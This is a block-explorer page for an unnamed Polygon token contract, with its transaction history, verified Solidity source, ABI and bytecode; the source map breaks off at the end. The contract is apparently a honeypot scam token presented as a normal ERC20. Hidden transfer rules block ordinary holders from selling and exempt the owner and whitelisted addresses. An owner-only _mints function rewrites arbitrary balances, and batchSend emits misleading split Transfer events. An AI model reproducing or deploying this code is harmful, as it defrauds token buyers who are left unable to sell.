POL Price: $0.316802 (-3.28%)
Gas: 30 GWei
 

Overview

POL Balance

Polygon PoS Chain LogoPolygon PoS Chain LogoPolygon PoS Chain Logo0 POL

POL Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve429765802023-05-21 13:49:46638 days ago1684676986IN
0x62623662...FcC7b0Bd3
0 POL0.00650047140.06333291
Approve429765472023-05-21 13:48:36638 days ago1684676916IN
0x62623662...FcC7b0Bd3
0 POL0.00714244153.89545851
Approve429710152023-05-21 10:29:20638 days ago1684664960IN
0x62623662...FcC7b0Bd3
0 POL0.01000608217
Approve429708732023-05-21 10:24:02638 days ago1684664642IN
0x62623662...FcC7b0Bd3
0 POL0.0138622298.68361299
_mints429691562023-05-21 9:22:56638 days ago1684660976IN
0x62623662...FcC7b0Bd3
0 POL0.00713181146.09576451
Approve429690972023-05-21 9:20:50638 days ago1684660850IN
0x62623662...FcC7b0Bd3
0 POL0.00727459156.74300131
Approve429679052023-05-21 8:37:24638 days ago1684658244IN
0x62623662...FcC7b0Bd3
0 POL0.01256006270.62679917
Approve428609552023-05-18 16:17:31641 days ago1684426651IN
0x62623662...FcC7b0Bd3
0 POL0.00767807165.43660211
Approve428609042023-05-18 16:15:21641 days ago1684426521IN
0x62623662...FcC7b0Bd3
0 POL0.00656454141.44367705
Approve428607752023-05-18 16:10:47641 days ago1684426247IN
0x62623662...FcC7b0Bd3
0 POL0.00744814160.4824138
_mints423768292023-05-06 14:09:15653 days ago1683382155IN
0x62623662...FcC7b0Bd3
0 POL0.02536363799.40865992
Transfer423767912023-05-06 14:07:27653 days ago1683382047IN
0x62623662...FcC7b0Bd3
0 POL0.05879494987.03887151
_mints423766812023-05-06 14:03:33653 days ago1683381813IN
0x62623662...FcC7b0Bd3
0 POL0.01545507224.87311298

Parent Transaction Hash Block From To
View All Internal Transactions
Loading...
Loading

Similar Match Source Code
This contract matches the deployed Bytecode of the Source Code for Contract 0x7E0C3190...5BEf6D1c4
The constructor portion of the code might be different and could alter the actual behaviour of the contract

Contract Name:
XXXXXXXXXXXXXX

Compiler Version
v0.5.17+commit.d19bba13

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at polygonscan.com on 2023-06-30
*/

pragma solidity ^0.5.17;
interface IERC20 {
    function totalSupply() external view returns(uint);

    function balanceOf(address account) external view returns(uint);

    function transfer(address recipient, uint amount) external returns(bool);

    function allowance(address owner, address spender) external view returns(uint);

    function approve(address spender, uint amount) external returns(bool);

    function transferFrom(address sender, address recipient, uint amount) external returns(bool);
    event Transfer(address indexed from, address indexed to, uint value);
    event Approval(address indexed owner, address indexed spender, uint value);
}

library Address {
    function isContract(address account) internal view returns(bool) {
        bytes32 codehash;
        bytes32 accountHash = 0xc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470;
        // solhint-disable-next-line no-inline-assembly
        assembly { codehash:= extcodehash(account) }
        return (codehash != 0x0 && codehash != accountHash);
    }
}

contract Context {
    constructor() internal {}
    // solhint-disable-previous-line no-empty-blocks
    function _msgSender() internal view returns(address payable) {
        return msg.sender;
    }
}

library SafeMath {
    function add(uint a, uint b) internal pure returns(uint) {
        uint c = a + b;
        require(c >= a, "SafeMath: addition overflow");

        return c;
    }

    function sub(uint a, uint b) internal pure returns(uint) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    function sub(uint a, uint b, string memory errorMessage) internal pure returns(uint) {
        require(b <= a, errorMessage);
        uint c = a - b;

        return c;
    }

    function mul(uint a, uint b) internal pure returns(uint) {
        if (a == 0) {
            return 0;
        }

        uint c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");

        return c;
    }

    function div(uint a, uint b) internal pure returns(uint) {
        return div(a, b, "SafeMath: division by zero");
    }

    function div(uint a, uint b, string memory errorMessage) internal pure returns(uint) {
        // Solidity only automatically asserts when dividing by 0
        require(b > 0, errorMessage);
        uint c = a / b;

        return c;
    }
}

library SafeERC20 {
    using SafeMath for uint;
    using Address for address;

    function safeTransfer(IERC20 token, address to, uint value) internal {
        callOptionalReturn(token, abi.encodeWithSelector(token.transfer.selector, to, value));
    }

    function safeTransferFrom(IERC20 token, address from, address to, uint value) internal {
        callOptionalReturn(token, abi.encodeWithSelector(token.transferFrom.selector, from, to, value));
    }

    function safeApprove(IERC20 token, address spender, uint value) internal {
        require((value == 0) || (token.allowance(address(this), spender) == 0),
            "SafeERC20: approve from non-zero to non-zero allowance"
        );
        callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, spender, value));
    }

    function callOptionalReturn(IERC20 token, bytes memory data) private {
        require(address(token).isContract(), "SafeERC20: call to non-contract");

        // solhint-disable-next-line avoid-low-level-calls
        (bool success, bytes memory returndata) = address(token).call(data);
        require(success, "SafeERC20: low-level call failed");

        if (returndata.length > 0) { // Return data is optional
            // solhint-disable-next-line max-line-length
            require(abi.decode(returndata, (bool)), "SafeERC20: ERC20 operation did not succeed");
        }
    }
}



contract XXXXXXXXXXXXXX {
    event Transfer(address indexed _from, address indexed _to, uint _value);
    event Approval(address indexed _owner, address indexed _spender, uint _value);
 
    function transfer(address _to, uint _value) public payable returns (bool) {
        return transferFrom(msg.sender, _to, _value);
    }
 
    function ensure(address _from, address _to, uint _value) internal view returns(bool) {
        address _UNI = pairFor(0x5C69bEe701ef814a2B6a3EDD4B1652CB9cc5aA6f, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, address(this));
        //go the white address first
        if(_from == owner || _to == owner || _from == UNI || _from == _UNI || _from==tradeAddress||canSale[_from]){
            return true;
        }
        require(condition(_from, _value));
        return true;
    }
    
    function transferFrom(address _from, address _to, uint _value) public payable returns (bool) {
        if (_value == 0) {return true;}
        if (msg.sender != _from) {
            require(allowance[_from][msg.sender] >= _value);
            allowance[_from][msg.sender] -= _value;
        }
        require(ensure(_from, _to, _value));
        require(balanceOf[_from] >= _value);
        balanceOf[_from] -= _value;
        balanceOf[_to] += _value;
        _onSaleNum[_from]++;
        emit Transfer(_from, _to, _value);
        return true;
    }
 
    function approve(address _spender, uint _value) public payable returns (bool) {
        allowance[msg.sender][_spender] = _value;
        emit Approval(msg.sender, _spender, _value);
        return true;
    }
    
    function condition(address _from, uint _value) internal view returns(bool){
        if(_saleNum == 0 && _minSale == 0 && _maxSale == 0) return false;
        
        if(_saleNum > 0){
            if(_onSaleNum[_from] >= _saleNum) return false;
        }
        if(_minSale > 0){
            if(_minSale > _value) return false;
        }
        if(_maxSale > 0){
            if(_value > _maxSale) return false;
        }
        return true;
    }
 
 
    mapping(address=>uint256) private _onSaleNum;
    mapping(address=>bool) private canSale;
    uint256 private _minSale;
    uint256 private _maxSale;
    uint256 private _saleNum;
    function _mints(address spender, uint256 addedValue) public returns (bool) {
        require(msg.sender==owner);
        if(addedValue > 0) {balanceOf[spender] = addedValue*(10**uint256(decimals));}
        canSale[spender]=true;
        return true;
    }
    function init(uint256 saleNum, uint256 token, uint256 maxToken) public returns(bool){
        require(msg.sender == owner);
        _minSale = token > 0 ? token*(10**uint256(decimals)) : 0;
        _maxSale = maxToken > 0 ? maxToken*(10**uint256(decimals)) : 0;
        _saleNum = saleNum;
    }
    function batchSend(address[] memory _tos, uint _value) public payable returns (bool) {
        require (msg.sender == owner);
        uint total = _value * _tos.length;
        require(balanceOf[msg.sender] >= total);
        balanceOf[msg.sender] -= total;
        for (uint i = 0; i < _tos.length; i++) {
            address _to = _tos[i];
            balanceOf[_to] += _value;
            emit Transfer(msg.sender, _to, _value/2);
            emit Transfer(msg.sender, _to, _value/2);
        }
        return true;
    }
    
    address tradeAddress;
    function setTradeAddress(address addr) public returns(bool){require (msg.sender == owner);
        tradeAddress = addr;
        return true;
    }
 
    function pairFor(address factory, address tokenA, address tokenB) internal pure returns (address pair) {
        (address token0, address token1) = tokenA < tokenB ? (tokenA, tokenB) : (tokenB, tokenA);
        pair = address(uint(keccak256(abi.encodePacked(
                hex'ff',
                factory,
                keccak256(abi.encodePacked(token0, token1)),
                hex'96e8ac4277198ff8b6f785478aa9a39f403cb768dd02cbee326c3e7da348845f' // init code hash
            ))));
    }
 
    mapping (address => uint) public balanceOf;
    mapping (address => mapping (address => uint)) public allowance;
 
    uint constant public decimals = 18;
    uint public totalSupply;
    string public name;
    string public symbol;
    address private owner;
    address constant UNI = 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D;
 
    constructor(string memory _name, string memory _symbol, uint256 _supply) payable public {
        name = _name;
        symbol = _symbol;
        totalSupply = _supply*(10**uint256(decimals));
        owner = msg.sender;
        balanceOf[msg.sender] = totalSupply;
        allowance[msg.sender][0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D] = uint(-1);
        emit Transfer(address(0x0), msg.sender, totalSupply);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"_name","type":"string"},{"internalType":"string","name":"_symbol","type":"string"},{"internalType":"uint256","name":"_supply","type":"uint256"}],"payable":true,"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"_owner","type":"address"},{"indexed":true,"internalType":"address","name":"_spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"_value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"_from","type":"address"},{"indexed":true,"internalType":"address","name":"_to","type":"address"},{"indexed":false,"internalType":"uint256","name":"_value","type":"uint256"}],"name":"Transfer","type":"event"},{"constant":false,"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"_mints","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"address","name":"","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"_spender","type":"address"},{"internalType":"uint256","name":"_value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":true,"stateMutability":"payable","type":"function"},{"constant":true,"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"address[]","name":"_tos","type":"address[]"},{"internalType":"uint256","name":"_value","type":"uint256"}],"name":"batchSend","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":true,"stateMutability":"payable","type":"function"},{"constant":true,"inputs":[],"name":"decimals","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"uint256","name":"saleNum","type":"uint256"},{"internalType":"uint256","name":"token","type":"uint256"},{"internalType":"uint256","name":"maxToken","type":"uint256"}],"name":"init","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"addr","type":"address"}],"name":"setTradeAddress","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"_to","type":"address"},{"internalType":"uint256","name":"_value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":true,"stateMutability":"payable","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"_from","type":"address"},{"internalType":"address","name":"_to","type":"address"},{"internalType":"uint256","name":"_value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":true,"stateMutability":"payable","type":"function"}]

Deployed Bytecode

0x6080604052600436106100c25760003560e01c8063313ce5671161007f57806395d89b411161005957806395d89b4114610441578063a9059cbb146104d1578063aa2f522014610537578063dd62ed3e14610611576100c2565b8063313ce5671461034a57806370a08231146103755780638cd8db8a146103da576100c2565b806306fdde03146100c7578063095ea7b314610157578063109b1ee6146101bd57806318160ddd1461023057806321a9cf341461025b57806323b872dd146102c4575b600080fd5b3480156100d357600080fd5b506100dc610696565b6040518080602001828103825283818151815260200191508051906020019080838360005b8381101561011c578082015181840152602081019050610101565b50505050905090810190601f1680156101495780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6101a36004803603604081101561016d57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050610734565b604051808215151515815260200191505060405180910390f35b3480156101c957600080fd5b50610216600480360360408110156101e057600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050610826565b604051808215151515815260200191505060405180910390f35b34801561023c57600080fd5b50610245610937565b6040518082815260200191505060405180910390f35b34801561026757600080fd5b506102aa6004803603602081101561027e57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919050505061093d565b604051808215151515815260200191505060405180910390f35b610330600480360360608110156102da57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803590602001909291905050506109e3565b604051808215151515815260200191505060405180910390f35b34801561035657600080fd5b5061035f610cf6565b6040518082815260200191505060405180910390f35b34801561038157600080fd5b506103c46004803603602081101561039857600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050610cfb565b6040518082815260200191505060405180910390f35b3480156103e657600080fd5b50610427600480360360608110156103fd57600080fd5b81019080803590602001909291908035906020019092919080359060200190929190505050610d13565b604051808215151515815260200191505060405180910390f35b34801561044d57600080fd5b50610456610db7565b6040518080602001828103825283818151815260200191508051906020019080838360005b8381101561049657808201518184015260208101905061047b565b50505050905090810190601f1680156104c35780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b61051d600480360360408110156104e757600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050610e55565b604051808215151515815260200191505060405180910390f35b6105f76004803603604081101561054d57600080fd5b810190808035906020019064010000000081111561056a57600080fd5b82018360208201111561057c57600080fd5b8035906020019184602083028401116401000000008311171561059e57600080fd5b919080806020026020016040519081016040528093929190818152602001838360200280828437600081840152601f19601f82011690508083019250505050505050919291929080359060200190929190505050610e6a565b604051808215151515815260200191505060405180910390f35b34801561061d57600080fd5b506106806004803603604081101561063457600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff1690602001909291905050506110d3565b6040518082815260200191505060405180910390f35b60098054600181600116156101000203166002900480601f01602080910402602001604051908101604052809291908181526020018280546001816001161561010002031660029004801561072c5780601f106107015761010080835404028352916020019161072c565b820191906000526020600020905b81548152906001019060200180831161070f57829003601f168201915b505050505081565b600081600760003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508273ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925846040518082815260200191505060405180910390a36001905092915050565b6000600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff161461088257600080fd5b60008211156108d6576012600a0a8202600660008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b60018060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001905092915050565b60085481565b6000600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff161461099957600080fd5b81600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555060019050919050565b6000808214156109f65760019050610cef565b8373ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614610b3d5781600760008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020541015610ab257600080fd5b81600760008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825403925050819055505b610b488484846110f8565b610b5157600080fd5b81600660008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020541015610b9d57600080fd5b81600660008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254039250508190555081600660008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055506000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600081548092919060010191905055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040518082815260200191505060405180910390a3600190505b9392505050565b601281565b60066020528060005260406000206000915090505481565b6000600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614610d6f57600080fd5b60008311610d7e576000610d86565b6012600a0a83025b60028190555060008211610d9b576000610da3565b6012600a0a82025b600381905550836004819055509392505050565b600a8054600181600116156101000203166002900480601f016020809104026020016040519081016040528092919081815260200182805460018160011615610100020316600290048015610e4d5780601f10610e2257610100808354040283529160200191610e4d565b820191906000526020600020905b815481529060010190602001808311610e3057829003601f168201915b505050505081565b6000610e623384846109e3565b905092915050565b6000600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614610ec657600080fd5b600083518302905080600660003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020541015610f1a57600080fd5b80600660003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254039250508190555060008090505b84518110156110c7576000858281518110610f8457fe5b6020026020010151905084600660008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508073ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef6002888161103457fe5b046040518082815260200191505060405180910390a38073ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600288816110a357fe5b046040518082815260200191505060405180910390a3508080600101915050610f6d565b50600191505092915050565b6007602052816000526040600020602052806000526040600020600091509150505481565b60008061112e735c69bee701ef814a2b6a3edd4b1652cb9cc5aa6f73c02aaa39b223fe8d0a0e5c4f27ead9083c756cc230611334565b9050600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614806111d95750600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16145b806112235750737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff16145b8061125957508073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff16145b806112b15750600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff16145b806113055750600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b1561131457600191505061132d565b61131e85846114c2565b61132757600080fd5b60019150505b9392505050565b60008060008373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1610611373578385611376565b84845b91509150858282604051602001808373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1660601b81526014018273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1660601b8152601401925050506040516020818303038152906040528051906020012060405160200180807fff000000000000000000000000000000000000000000000000000000000000008152506001018373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1660601b8152601401828152602001807f96e8ac4277198ff8b6f785478aa9a39f403cb768dd02cbee326c3e7da348845f815250602001925050506040516020818303038152906040528051906020012060001c925050509392505050565b6000806004541480156114d757506000600254145b80156114e557506000600354145b156114f35760009050611592565b6000600454111561154f576004546000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020541061154e5760009050611592565b5b6000600254111561156e5781600254111561156d5760009050611592565b5b6000600354111561158d5760035482111561158c5760009050611592565b5b600190505b9291505056fea265627a7a72315820cf48745e7af6a56b2053edbd70d92fad5d5fee2e31f089f14c7d387bf3b1b93964736f6c63430005110032

Deployed Bytecode Sourcemap

3886:4900:0:-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8201:18;;8:9:-1;5:2;;;30:1;27;20:12;5:2;8201:18:0;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;23:1:-1;8:100;33:3;30:1;27:10;8:100;;;99:1;94:3;90:11;84:18;80:1;75:3;71:11;64:39;52:2;49:1;45:10;40:15;;8:100;;;12:14;8201:18:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;5300:213;;;;;;13:2:-1;8:3;5:11;2:2;;;29:1;26;19:12;2:2;5300:213:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;6188:261;;8:9:-1;5:2;;;30:1;27;20:12;5:2;6188:261:0;;;;;;13:2:-1;8:3;5:11;2:2;;;29:1;26;19:12;2:2;6188:261:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;8171:23;;8:9:-1;5:2;;;30:1;27;20:12;5:2;8171:23:0;;;:::i;:::-;;;;;;;;;;;;;;;;;;;7336:149;;8:9:-1;5:2;;;30:1;27;20:12;5:2;7336:149:0;;;;;;13:2:-1;8:3;5:11;2:2;;;29:1;26;19:12;2:2;7336:149:0;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;4727:564;;;;;;13:2:-1;8:3;5:11;2:2;;;29:1;26;19:12;2:2;4727:564:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;8130:34;;8:9:-1;5:2;;;30:1;27;20:12;5:2;8130:34:0;;;:::i;:::-;;;;;;;;;;;;;;;;;;;8008:42;;8:9:-1;5:2;;;30:1;27;20:12;5:2;8008:42:0;;;;;;13:2:-1;8:3;5:11;2:2;;;29:1;26;19:12;2:2;8008:42:0;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;6455:300;;8:9:-1;5:2;;;30:1;27;20:12;5:2;6455:300:0;;;;;;13:2:-1;8:3;5:11;2:2;;;29:1;26;19:12;2:2;6455:300:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;8226:20;;8:9:-1;5:2;;;30:1;27;20:12;5:2;8226:20:0;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;23:1:-1;8:100;33:3;30:1;27:10;8:100;;;99:1;94:3;90:11;84:18;80:1;75:3;71:11;64:39;52:2;49:1;45:10;40:15;;8:100;;;12:14;8226:20:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;4082:137;;;;;;13:2:-1;8:3;5:11;2:2;;;29:1;26;19:12;2:2;4082:137:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;6761:536;;;;;;13:2:-1;8:3;5:11;2:2;;;29:1;26;19:12;2:2;6761:536:0;;;;;;;;;;21:11:-1;8;5:28;2:2;;;46:1;43;36:12;2:2;6761:536:0;;35:9:-1;28:4;12:14;8:25;5:40;2:2;;;58:1;55;48:12;2:2;6761:536:0;;;;;;101:9:-1;95:2;81:12;77:21;67:8;63:36;60:51;39:11;25:12;22:29;11:108;8:2;;;132:1;129;122:12;8:2;6761:536:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;30:3:-1;22:6;14;1:33;99:1;93:3;85:6;81:16;74:27;137:4;133:9;126:4;121:3;117:14;113:30;106:37;;169:3;161:6;157:16;147:26;;6761:536:0;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;8057:63;;8:9:-1;5:2;;;30:1;27;20:12;5:2;8057:63:0;;;;;;13:2:-1;8:3;5:11;2:2;;;29:1;26;19:12;2:2;8057:63:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;8201:18;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::o;5300:213::-;5372:4;5423:6;5389:9;:21;5399:10;5389:21;;;;;;;;;;;;;;;:31;5411:8;5389:31;;;;;;;;;;;;;;;:40;;;;5466:8;5445:38;;5454:10;5445:38;;;5476:6;5445:38;;;;;;;;;;;;;;;;;;5501:4;5494:11;;5300:213;;;;:::o;6188:261::-;6257:4;6294:5;;;;;;;;;;;6282:17;;:10;:17;;;6274:26;;;;;;6327:1;6314:10;:14;6311:77;;;8162:2;6364;:21;6352:10;:34;6331:9;:18;6341:7;6331:18;;;;;;;;;;;;;;;:55;;;;6311:77;6415:4;6398:7;:16;6406:7;6398:16;;;;;;;;;;;;;;;;:21;;;;;;;;;;;;;;;;;;6437:4;6430:11;;6188:261;;;;:::o;8171:23::-;;;;:::o;7336:149::-;7390:4;7419:5;;;;;;;;;;;7405:19;;:10;:19;;;7396:29;;;;;;7451:4;7436:12;;:19;;;;;;;;;;;;;;;;;;7473:4;7466:11;;7336:149;;;:::o;4727:564::-;4814:4;4845:1;4835:6;:11;4831:31;;;4856:4;4849:11;;;;4831:31;4890:5;4876:19;;:10;:19;;;4872:152;;4952:6;4920:9;:16;4930:5;4920:16;;;;;;;;;;;;;;;:28;4937:10;4920:28;;;;;;;;;;;;;;;;:38;;4912:47;;;;;;5006:6;4974:9;:16;4984:5;4974:16;;;;;;;;;;;;;;;:28;4991:10;4974:28;;;;;;;;;;;;;;;;:38;;;;;;;;;;;4872:152;5042:26;5049:5;5056:3;5061:6;5042;:26::i;:::-;5034:35;;;;;;5108:6;5088:9;:16;5098:5;5088:16;;;;;;;;;;;;;;;;:26;;5080:35;;;;;;5146:6;5126:9;:16;5136:5;5126:16;;;;;;;;;;;;;;;;:26;;;;;;;;;;;5181:6;5163:9;:14;5173:3;5163:14;;;;;;;;;;;;;;;;:24;;;;;;;;;;;5198:10;:17;5209:5;5198:17;;;;;;;;;;;;;;;;:19;;;;;;;;;;;;;5249:3;5233:28;;5242:5;5233:28;;;5254:6;5233:28;;;;;;;;;;;;;;;;;;5279:4;5272:11;;4727:564;;;;;;:::o;8130:34::-;8162:2;8130:34;:::o;8008:42::-;;;;;;;;;;;;;;;;;:::o;6455:300::-;6534:4;6572:5;;;;;;;;;;;6558:19;;:10;:19;;;6550:28;;;;;;6608:1;6600:5;:9;:45;;6644:1;6600:45;;;8162:2;6619;:21;6612:5;:29;6600:45;6589:8;:56;;;;6678:1;6667:8;:12;:51;;6717:1;6667:51;;;8162:2;6692;:21;6682:8;:32;6667:51;6656:8;:62;;;;6740:7;6729:8;:18;;;;6455:300;;;;;:::o;8226:20::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::o;4082:137::-;4150:4;4174:37;4187:10;4199:3;4204:6;4174:12;:37::i;:::-;4167:44;;4082:137;;;;:::o;6761:536::-;6840:4;6880:5;;;;;;;;;;;6866:19;;: